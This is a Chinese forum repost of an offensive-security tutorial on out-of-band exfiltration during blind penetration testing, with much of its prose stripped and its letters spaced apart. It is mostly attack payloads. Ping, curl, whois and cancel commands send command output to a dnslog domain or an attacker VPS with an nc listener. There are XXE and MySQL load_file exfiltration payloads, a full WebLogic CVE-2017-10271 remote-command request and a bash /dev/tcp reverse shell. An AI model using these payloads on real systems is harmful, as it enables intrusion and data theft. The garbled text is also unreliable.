[21989] 2021-05-20_干货如何在无回显时渗透

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2021-05-20_干货如何在无回显时渗透 |   L e m o n S e c   2 0 2 1 - 0 5 - 2 0 1 . p i n g d n s l o g 使 B u r p S u i t e B u r p   C o l l a b o r a t o r   c l i e n t B u r p S u i t e                                                                                 B u r p   C o l l a b o r a t o r   c l i e n t c e y e . i o B u r p   C o l l a b o r a t o r   c l i e n t u n a m e C o p y   t o   c l i p b o a r d p i n g   ` ` . d n s l o g
C o p y   t o   c l i p b o a r d B u r p   C o l l a b o r a t o r   c l i e n t p i n g
u n a m e u n a m e 2 . c u r l W i n 1 0 W i n S e r v e r 2 0 1 6 c u r l c u r l   d n s l o g / ` | b a s e 6 4 | t r   ' n '   ' - ' ` c u r l   d n s l o g / ` | t r   ' n '   ' - ' `
h t t p c u r l 使 b a s e 6 4
b a s e 6 4 / - h o s t d n s d n s d n s l o g u k n o w n   h o s t h o s t d n s l o g i p d n s l o g
3 . w h o i s w h o i s w h o i s v p s i p v p s 6 6 6 6 u n a m e 6 6 6 6 ( m y i p v p s i p ) w h o i s   - h   v p s i p   - p   p o r t   ` ` w h o i s   - h   v p s i p   - p   p o r t   `   | b a s e 6 4 ` n c   - l   - p   6 6 6 6   - v v v w h o i s   - h   m y i p   - p   6 6 6 6   ` u n a m e ` w h o i s   - h   m y i p   - p   6 6 6 6   ` u n a m e   | b a s e 6 4 `
v p s 4 . c a n c e l w h o i s c a n c e l v p s " m y - j o b s " 西 使 1 . S Q L S Q L m y s q l l o a d _ f i l e d n s d n s l o g " . " 2 . X X E d t d c a n c e l   - u   " $ ( ) "   - h   v p s ' i p : p o r t s e l e c t   l o a d _ f i l e ( c o n c a t ( ' ' , ( S Q L ) , ' . d n s l o g 便 ' ) ) # p a y l o a d 1 < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 " ? > < ! D O C T Y P E   r o o t   [ < ! E N T I T Y   %   r e m o t e   S Y S T E M   " h t t p : / / d n s l o g / 便 " > % r e m o t e ; ] >
3 . R C E W e b l o g i c   X M L   D e c o d e r ( C V E - 2 0 1 7 - 1 0 2 7 1 ) % r e m o t e ; ] > < r o o t / > # p a y l o a d 2 < ! E N T I T Y   %   a l l " < ! E N T I T Y   & # x 2 5 ;   s e n d   S Y S T E M   ' h t t p : / / d n s l o g / % f i l e ; ' > " > % a l l ; P O S T   / w l s - w s a t / C o o r d i n a t o r P o r t T y p e   H T T P / 1 . 1 H o s t : x . x . x . x : x C a c h e - C o n t r o l :   m a x - a g e = 0 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 4 _ 3 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 7 2 . 0 . 3 6 2 6 . 1 1 9   S a f a r i / 5 3 7 . 3 6 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , i m a g e / a p n g , * / * ; q = 0 . 8 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 9 C o n n e c t i o n :   c l o s e C o n t e n t - L e n g t h :   6 4 0 < s o a p e n v : E n v e l o p e   x m l n s : s o a p e n v = " h t t p : / / s c h e m a s . x m l s o a p . o r g / s o a p / e n v e l o p e / " >   < s o a p e n v : H e a d e r > < w o r k : W o r k C o n t e x t   x m l n s : w o r k = " h t t p : / / b e a . c o m / 2 0 0 4 / 0 6 / s o a p / w o r k a r e a / " > < j a v a   v e r s i o n = " 1 . 4 . 0 "   c l a s s = " j a v a . b e a n s . X M L D e c o d e r " > < v o i d   c l a s s = " j a v a . l a n g . P r o c e s s B u i l d e r " > < a r r a y   c l a s s = " j a v a . l a n g . S t r i n g "   l e n g t h = " 3 " > < v o i d   i n d e x = " 0 " > < s t r i n g > / b i n / b a s h < / s t r i n g > < / v o i d > < v o i d   i n d e x = " 1 " > < s t r i n g > - c < / s t r i n g > < / v o i d > < v o i d   i n d e x = " 2 " > < s t r i n g > < / s t r i n g >
( h t m l p a y l o a d L i n u x w i n / b i n / b a s h c m d c m d . e x e , - c / c ) h t m l h t m l < s t r i n g > < / s t r i n g > < / v o i d > < / a r r a y > < v o i d   m e t h o d = " s t a r t " / > < / v o i d > < / j a v a > < / w o r k : W o r k C o n t e x t > < / s o a p e n v : H e a d e r > < s o a p e n v : B o d y / > < / s o a p e n v : E n v e l o p e > p i n g   ` ` . d n s l o g c u r l   d n s l o g / ` | b a s e 6 4 | t r   ' n '   ' - ' ` c u r l   d n s l o g / ` | t r   ' n '   ' - ' ` w h o i s   - h   v p s i p   - p   p o r t   ` ` w h o i s   - h   v p s i p   - p   p o r t   `   | b a s e 6 4 ` c a n c e l   - u   " $ ( ) "   - h   v p s ' i p : p o r t # s h e l l b a s h   - i   > &   / d e v / t c p / 1 2 7 . 0 . 0 . 1 / 8 0 8 0   0 > & 1 b a s h   - i   > &   / d e v / t c p / 1 2 7 . 0 . 0 . 1 / 8 0 8 0   0 > & 1 b a s h   - i   & g t ; & a m p ;   / d e v / t c p / 1 2 7 . 0 . 0 . 1 / 8 0 8 0   0 & g t ; & a m p ; 1
h t t p s : / / w w w . q q x i u z i . c n / b i a n m a / z i f u s h i t i . p h p 4 . S S R F v p s ' i p d n s l o g 使 v p s v p s 使 d n s l o g d n s l o g v i d e o _ u r l 5 . X S S 使 P a y l o a d L e m o n S e c b a s h   - i   & g t ; & a m p ;   / d e v / t c p / 1 2 7 . 0 . 0 . 1 / 8 0 8 0   0 & g t ; & a m p ; 1 v i d e o _ u r l = h t t p : / / v p s ' i p : p o r t v i d e o _ u r l = d n s l o g < I M G   S R C = #   o n e r r o r = h t t p : / / d n s l o g / 便 >
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则